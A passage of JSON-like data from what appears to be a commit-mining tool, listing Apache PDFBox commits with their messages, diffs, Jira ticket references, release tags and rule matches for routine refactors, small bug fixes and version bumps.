"+ angledStyles.add(PDAnnotationLine.LE_R_CLOSED_ARROW);", + "+ angledStyles.add(PDAnnotationLine.LE_R_OPEN_ARROW);", + "+ angledStyles.add(PDAnnotationLine.LE_BUTT);", + "+ angledStyles.add(PDAnnotationLine.LE_SLASH);", + "+ return Collections.unmodifiableSet(angledStyles);", + "+ }", + "+", + " /**" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "279711b14279243bbe585976816f3a300d9f6417", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1531171390, + "hunks": 1, + "message": "PDFBOX-4071: remove unneeded code, expression is never null git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1835499 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java b/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", + "index d08a469ff..1ff32c985 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java", + "@@ -192,6 +192,2 @@ public class CreateSignature implements SignatureInterface", + " {", + "- if (randomAccessFile!= null) ", + "- {", + "- randomAccessFile.close();", + "- }", + " if (scratchFile != null && scratchFile.exists() && !scratchFile.delete())" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/signature/CreateSignature.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "069984d3b643657dbf757037f1ab4f5041466a47", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527329478, + "hunks": 1, + "message": "PDFBOX-3353: remove unused assignment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832302 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "index 75fd04e72..6738ed733 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "@@ -94,3 +94,3 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", + "- PDRectangle borderBox = null;", + "+ PDRectangle borderBox;", + " float[] rectDifferences = annotation.getRectDifferences();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "177005340033939c891927edc0b0b3daa4a07289", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523900550, + "hunks": 4, + "message": "PDFBOX-4142: omit md5 checksums, replace SHA-1 with SHA-512, adjust text git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829304 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pom.xml b/pom.xml", + "index 5b96d706f..71f4fcc77 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -116,3 +116,3 @@", + " ", + "- ", + "+ ", + " ", + "@@ -122,9 +122,3 @@", + " ", + "- ", + "- ", + "- ", + "- ", + "- ", + "- ", + "- ", + "+ ", + " ", + "@@ -142,3 +136,3 @@ The release candidate is a zip archive of the sources in:", + "-The SHA1 checksum of the archive is ${checksum}.", + "+The SHA-512 checksum of the archive is ${checksum}.", + "@@ -157,2 +151,6 @@ The release candidate has been prepared in:", + "+Please commit it to", + "+", + "+ https://dist.apache.org/repos/dist/dev/pdfbox/${project.version}/", + "+", + " A release vote template has been generated for you:" + ], + "changed_files": [ + "pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4142": "", + "SHA-1": "", + "SHA-512": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.14", + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4142, SHA-1, SHA-512", + "relevance": 2 + } + ] + }, + { + "commit_id": "3d42684056f8af17fef18b23aaf3e31382d3cd6f", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530634795, + "hunks": 2, + "message": "PDFBOX-3353: forgot to close path; increase rectangle padding like Adobe does git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835003 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index 29730a10b..7b4c99e31 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -87,4 +87,4 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + "- rect.setLowerLeftX(Math.min(minX - lineWidth / 2, rect.getLowerLeftX()));", + "- rect.setLowerLeftY(Math.min(minY - lineWidth / 2, rect.getLowerLeftY()));", + "+ rect.setLowerLeftX(Math.min(minX - lineWidth, rect.getLowerLeftX()));", + "+ rect.setLowerLeftY(Math.min(minY - lineWidth, rect.getLowerLeftY()));", + " rect.setUpperRightX(Math.max(maxX + lineWidth, rect.getUpperRightX()));", + "@@ -156,2 +156,3 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "+ contentStream.closePath();", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "a2f44d980e065c4f66004b5ac0711b309af58cec", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525908281, + "hunks": 1, + "message": "PDFBOX-4189: bug fix - subset is empty if both id sets are empty git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831290 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "index 1e7b4880a..391983452 100755", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java", + "@@ -992,3 +992,3 @@ public final class TTFSubsetter", + " {", + "- if (glyphIds.isEmpty() || uniToGID.isEmpty())", + "+ if (glyphIds.isEmpty() && uniToGID.isEmpty())", + " {" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/TTFSubsetter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "acf2c2cca7335881a95e09b16510b01a60426677", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524336082, + "hunks": 2, + "message": "PDFBOX-4071: add override, improve message git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829740 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", + "index 181b71753..da39b607f 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java", + "@@ -49,2 +49,3 @@ public class IndexToLocationTable extends TTFTable", + " */", + "+ @Override", + " public void read(TrueTypeFont ttf, TTFDataStream data) throws IOException", + "@@ -66,3 +67,3 @@ public class IndexToLocationTable extends TTFTable", + " {", + "- throw new IOException( \"Error:TTF.loca unknown offset format.\");", + "+ throw new IOException( \"Error:TTF.loca unknown offset format: \" + head.getIndexToLocFormat());", + " }" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/IndexToLocationTable.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "c43f4b2a31b375bce61aef3845138998c543ad55", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532781393, + "hunks": 1, + "message": "PDFBOX-4281: remove Apache Wink dependency, add class from Apache Wink + dependencies git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836896 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index c270176a5..bf47f5026 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -87,5 +87,11 @@", + " ", + "- org.apache.wink", + "- wink-component-test-support", + "- 1.4", + "+ javax.servlet", + "+ javax.servlet-api", + "+ 4.0.1", + "+ test", + "+ ", + "+ ", + "+ org.apache.geronimo.specs", + "+ geronimo-jaxrs_1.1_spec", + "+ 1.0", + " test" + ], + "changed_files": [ + "examples/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4281": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4281", + "relevance": 2 + } + ] + }, + { + "commit_id": "c3821388a0da6f86915aa96b1a8cebc605e6c167", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528569477, + "hunks": 4, + "message": "PDFBOX-3353: support /Cross git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833247 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "index 7311feaec..6d234de46 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "@@ -76,2 +76,7 @@ public class PDAnnotationText extends PDAnnotationMarkup", + "+ /**", + "+ * Constant for the name of a cross annotation.", + "+ */", + "+ public static final String NAME_CROSS = \"Cross\";", + "+", + " /**", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "index 5e0241496..aeaf70abe 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", + "@@ -55,2 +55,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", + "+ !PDAnnotationText.NAME_CROSS.equals(annotation.getName()) &&", + " !PDAnnotationText.NAME_CIRCLE.equals(annotation.getName()))", + "@@ -86,2 +87,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + " break;", + "+ case PDAnnotationText.NAME_CROSS:", + "+ drawCross(contentStream, bbox);", + "+ break;", + " case PDAnnotationText.NAME_CIRCLE:", + "@@ -171,2 +175,33 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", + "+ private void drawCross(final PDAppearanceContentStream contentStream, PDRectangle bbox)", + "+ throws IOException", + "+ {", + "+ // should be a square, but who knows...", + "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", + "+", + "+ // small = offset nearest bbox edge", + "+ // large = offset second nearest bbox edge", + "+ float small = min / 10;", + "+ float large = min / 5;", + "+", + "+ contentStream.setMiterLimit(4);", + "+ contentStream.setLineJoinStyle(1);", + "+ contentStream.setLineCapStyle(0);", + "+ contentStream.setLineWidth(0.59f); // value from Adobe", + "+", + "+ contentStream.moveTo(small, large);", + "+ contentStream.lineTo(large, small);", + "+ contentStream.lineTo(min / 2, min / 2 - small);", + "+ contentStream.lineTo(min - large, small);", + "+ contentStream.lineTo(min - small, large);", + "+ contentStream.lineTo(min / 2 + small, min / 2);", + "+ contentStream.lineTo(min - small, min - large);", + "+ contentStream.lineTo(min - large, min - small);", + "+ contentStream.lineTo(min / 2, min / 2 + small);", + "+ contentStream.lineTo(large, min - small);", + "+ contentStream.lineTo(small, min - large);", + "+ contentStream.lineTo(min / 2 - small, min / 2);", + "+ contentStream.closeAndFillAndStroke();", + "+ }", + "+", + " @Override" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationText.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "00f3aa4521b300057238ed418ad957c2f4118065", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527269236, + "hunks": 3, + "message": "PDFBOX-4189: Sonar fix git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832255 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index 8fa6c9337..39c5bbae2 100644", + "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "@@ -210,7 +210,6 @@ public class BengaliPdfGenerationHelloWorld", + "- if (line.startsWith(\"#\"))", + "+ if (!line.startsWith(\"#\"))", + " {", + "- continue;", + "+ lines.add(line);", + " }", + "- lines.add(line);", + " }" + ], + "changed_files": [ + "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "5ef99ad81b8d020c710511954e29a42e05fe2dcb", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527269108, + "hunks": 1, + "message": "PDFBOX-3353: remove double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832254 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index ebfa3b402..d9ae0fbe8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -103,3 +103,2 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + "- cs.setStrokingColor(color);", + " if (ab.dashArray != null)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "a93450cfcae7ff12faccbf1df2a4f0e4557622c3", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1528130277, + "hunks": 2, + "message": "PDFBOX-4071: remove unused assignment git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832870 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "index df9dd603b..8c5effaf8 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "@@ -231,3 +231,3 @@ public class PlainTextFormatter", + " {", + "- float wordWidth = 0f;", + "+ float wordWidth;", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "index 0fa2d5ee6..efa7741d1 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java", + "@@ -231,3 +231,3 @@ class PlainTextFormatter", + " {", + "- float wordWidth = 0f;", + "+ float wordWidth;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/layout/PlainTextFormatter.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PlainTextFormatter.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "aa56c9446e681fb243cd0db198a590320d7fdf49", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524836229, + "hunks": 3, + "message": "PDFBOX-4189: fix SonarQube pet peeve (variable hides a field) git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830353 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "index 7c9feaefb..396a9b549 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java", + "@@ -204,3 +204,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " {", + "- Map beforeAndAfterSpanGlyphIds = new HashMap<>();", + "+ Map result = new HashMap<>();", + "@@ -208,3 +208,3 @@ public class GsubWorkerForBengali implements GsubWorker", + " {", + "- beforeAndAfterSpanGlyphIds.put(", + "+ result.put(", + " getGlyphId(beforeAndAfterSpanComponent.originalCharacter),", + "@@ -213,3 +213,3 @@ public class GsubWorkerForBengali implements GsubWorker", + "- return Collections.unmodifiableMap(beforeAndAfterSpanGlyphIds);", + "+ return Collections.unmodifiableMap(result);", + " }" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/ttf/gsub/GsubWorkerForBengali.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4189": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4189", + "relevance": 2 + } + ] + }, + { + "commit_id": "161d67f7108b7abda85aab397b236258a3502889", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523896912, + "hunks": 1, + "message": "prepare for 1.8.14 release git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/1.8@1829296 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/build.xml b/pdfbox/build.xml", + "index ed22180c9..0fb2d4c9b 100644", + "--- a/pdfbox/build.xml", + "+++ b/pdfbox/build.xml", + "@@ -30,3 +30,3 @@", + "- ", + "+ " + ], + "changed_files": [ + "pdfbox/build.xml" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "1.8.14", + "1.8.15", + "1.8.16", + "1.8.17" + ], + "matched_rules": [] + }, + { + "commit_id": "a2fd9e2c9fa60c4cd46306a28fa95f93dc1fb604", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529348901, + "hunks": 16, + "message": "[maven-release-plugin] prepare release 2.0.10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833753 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/app/pom.xml b/app/pom.xml", + "index d9f8855bf..e5adcbef9 100644", + "--- a/app/pom.xml", + "+++ b/app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", + "index 71eb1798f..acf31fc39 100644", + "--- a/debugger-app/pom.xml", + "+++ b/debugger-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/debugger/pom.xml b/debugger/pom.xml", + "index 7f03b7cdf..6faddeccd 100644", + "--- a/debugger/pom.xml", + "+++ b/debugger/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/examples/pom.xml b/examples/pom.xml", + "index b641d1be1..3e199a72e 100644", + "--- a/examples/pom.xml", + "+++ b/examples/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 38b9b380f..ffa689b1c 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -23,3 +23,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 74dfe953b..7200d42ef 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -31,3 +31,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " pom", + "@@ -429,5 +429,5 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", + "- http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", + "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.10/pdfbox-parent", + "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.10/pdfbox-parent", + "+ http://svn.apache.org/viewvc/maven/pom/tags/2.0.10/pdfbox-parent", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 1d8bd38d8..4cf0b1940 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/pom.xml b/pom.xml", + "index 491ec68a9..01fe29b31 100644", + "--- a/pom.xml", + "+++ b/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " parent/pom.xml", + "@@ -36,8 +36,8 @@", + " ", + "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", + "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.10", + " ", + " ", + "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", + "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.10", + " ", + "- http://svn.apache.org/viewvc/pdfbox/branches/2.0", + "+ http://svn.apache.org/viewvc/pdfbox/tags/2.0.10", + " ", + "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", + "index 84d52213d..00b67fe2d 100644", + "--- a/preflight-app/pom.xml", + "+++ b/preflight-app/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index 5e8d7c775..8b73fde57 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -28,3 +28,3 @@", + " \t\tpdfbox-parent", + "-\t\t2.0.10-SNAPSHOT", + "+\t\t2.0.10", + " \t\t../parent/pom.xml", + "diff --git a/tools/pom.xml b/tools/pom.xml", + "index 37f81352e..d7f038039 100644", + "--- a/tools/pom.xml", + "+++ b/tools/pom.xml", + "@@ -25,3 +25,3 @@", + " pdfbox-parent", + "- 2.0.10-SNAPSHOT", + "+ 2.0.10", + " ../parent/pom.xml", + "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", + "index 